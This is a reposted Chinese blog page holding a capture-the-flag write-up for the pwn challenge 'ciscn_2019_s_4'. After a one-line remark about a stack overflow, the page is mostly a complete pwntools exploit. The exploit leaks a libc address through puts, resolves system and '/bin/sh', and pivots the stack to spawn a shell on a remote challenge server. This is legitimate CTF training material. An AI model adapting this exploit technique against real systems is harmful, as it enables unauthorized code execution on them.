ciscn_2019_s_4 - 代码天地

ciscn_2019_s_4

其他 2020-02-05 10:12:02 阅读次数: 0

可以看到有栈溢出的漏洞能过控制执行流
exp:

#!/usr/bin/python2
from pwn import *
from LibcSearcher import *
local=0
if local==1:
    p=process('./ciscn_s_4')
    elf=ELF('./ciscn_s_4')
    #libc=elf.libc
else:
    p=remote('node3.buuoj.cn',26963)
    elf=ELF('./ciscn_s_4')
    #libc=elf.libc
lg=lambda address,data:log.success('%s: '+hex(data))

def exp():
    main=0x080485FF
    put=0x804861D
    payload='a'*0x20+p32(elf.got['puts'])+'bbbb'*2+p32(main)
    p.recvuntil('name?')
    p.send(payload)
    p.recvuntil('Hello, ')
    p.recvuntil('\n')
    p.send(payload)
    payload='a'*0x28+'cccc'+p32(put)
    p.recvuntil('name?')
    p.send(payload)
    p.recvuntil('Hello, ')
    p.recvuntil('\n')
    p.send(payload)
    p.recvuntil('\x0a')
    puts=u32(p.recvuntil('\xf7')[-4:])
    libc=LibcSearcher('puts',puts)
    libcbase=puts-libc.dump('puts')
    lg('libcbase',libcbase)
    system=libcbase+libc.dump('system')
    bin_sh=libcbase+libc.dump('str_bin_sh')
    one_gadget=libcbase+0x3d0d5
    payload='a'*0x20+p32(bin_sh)+'bbbb'*2+p32(main)
    sleep(1)
    p.send(payload)
    p.recvuntil('Hello, ')
    p.recvuntil('\n')
    p.send(payload)
    p.recvuntil('name?')
    payload='a'*0x28+p32(0)+p32(0x08048559)
    p.send(payload)
    p.recvuntil('Hello, ')
    p.recvuntil('\n')
    p.send(payload)
    p.interactive()
if __name__=="__main__":
    exp()

发布了74 篇原创文章 · 获赞 9 · 访问量 1万+

私信关注

猜你喜欢

转载自blog.csdn.net/qq_37433000/article/details/104087911

ciscn_2019_s_4

【pwn】 ciscn_2019_s_4

ciscn_2019_n_4

【pwn】ciscn_2019_s_3

ciscn_2019_s_3的wp

ctf【ciscn_2019_s_3】

ciscn_2019_n_8

ciscn_2019_n_1

ciscn_2019_es_7

ciscn_2019_es_1

ciscn_2019_n_5

&pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2&

BUUCTF ciscn_2019_es_1

【BUUCTF - PWN】ciscn_2019_n_8

【BUUCTF - PWN】ciscn_2019_c_1

【BUUCTF - PWN】ciscn_2019_n_1

BUUCTF ciscn_2019_n_8

【pwn】ciscn_2019_es_2

buuctf ciscn_2019_n_3

ciscn_2019_es_2的wp

Buuctf(PWN)ciscn_2019_c_1

Buuctf(pwn) ciscn_2019_n_5

Buuctf(pwn)ciscn_2019_n_8

buuctf ciscn_2019_sw_5

ctf【ciscn_2019_n_8】

ctf【ciscn_2019_c_1】

[BUUCTF-pwn]——ciscn_2019_c_1

pwnable_start & ciscn_2019_es_2 & ez_pz_hackover_2016 & pwn2_sctf_2016

[CISCN2019 华东南赛区]Web4

[CISCN 2019]ikun题解

今日推荐

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

周排行

返回指定时间格式

fopen函数中的mode参数

Java 单例模式探讨

Flex remoteobject工作原理探讨

寻找mplayer的便捷安装方法

30天了解30种技术系列---(26)MySQL自动化运维工具Inception

关于Jboss/Tomcat/Jetty的JNDI定义123

程序减肥，strip，eu-strip 及其符号表

AsyncTask、View.post(Runnable)、ViewTreeObserver三种方式总结frame animation自动启动

Json和Bean的互相转换

每日归档

更多

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)